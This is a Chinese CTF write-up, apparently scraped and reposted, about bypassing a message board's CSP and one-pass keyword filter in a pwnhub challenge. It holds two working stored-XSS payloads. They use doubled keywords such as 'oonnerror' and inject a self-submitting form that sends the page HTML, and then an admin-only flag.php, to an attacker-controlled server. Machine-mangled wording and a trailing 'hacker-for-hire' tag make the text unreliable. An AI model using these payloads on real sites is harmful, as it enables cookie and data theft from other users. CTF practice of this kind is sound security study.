周末做了一道关于我来说很蛋疼的标题...可是看了各位师傅的writeup就觉得自己的思路太窄了....

标题地址：https://pwnhub.cn/gamedetail?id=13

注册之后有个留言板，有CSP(不允许对外发送恳求)，通过测验只过滤一次某些单次，如：on，oonn就能过。

用表单来绕过csp回来页面到我的服务器上，看到提示

poc:

<imong src=x oonnerror="var htmlstr = document.getElementsByTagName('html')[0].innerHTML;$('body').append('<form actioonn=http://xxx.xxx.xxx.xxx/hub1'+ escape(htmlstr)+' method=GET id=show></form><scronipt>document.getElementById('show').submit()</scronipt>')">

转码后发现提示( http://zone.secevery.com/code/index.html 在线编码转码...之前写的辣鸡程序...)：

拜访http://52.80.63.91/adminshigesha233e3333/ 提示flag.php

拜访flag.php 提示只要admin能看....

测验盲打admin回来flag.php的内容.

poc:

<imong src=x oonnerror="$.get('/adminshigesha233e3333/flag.php', functioonn(data){$('body').append('<form actioonn=http://xxx.xxx.xxx.xxx/'+ escape(data)+' method=GET id=show></form><scronipt>document.getElementById('show').submit()</scronipt>')})">

提示：nothing here,╮(╯-╰)╭,what ever you try, only from adminshigesha233e3333 can read it...

http://52.80.63.91/adminshigesha233e3333/

检查源码：

[1] [2]  黑客接单网